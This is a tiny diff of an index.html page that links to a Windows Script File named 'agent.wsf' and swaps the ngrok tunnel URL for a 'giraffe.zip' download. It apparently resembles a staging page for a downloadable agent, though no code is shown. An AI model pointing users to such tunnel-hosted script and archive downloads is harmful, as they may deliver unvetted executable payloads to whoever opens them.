--- a/index.html
+++ b/index.html
@@ -1,5 +1,5 @@
 
 <a href="agent/agent.wsf">Agent</a>
 <br/>
-<a href="https://04f7-2a00-1370-817a-a600-39a6-8411-a66f-759d.ngrok-free.app/agent/giraffe.zip">Giraffe</a>
+<a href="https://8a73-109-252-43-239.ngrok-free.app/agent/giraffe.zip">Giraffe</a>
     
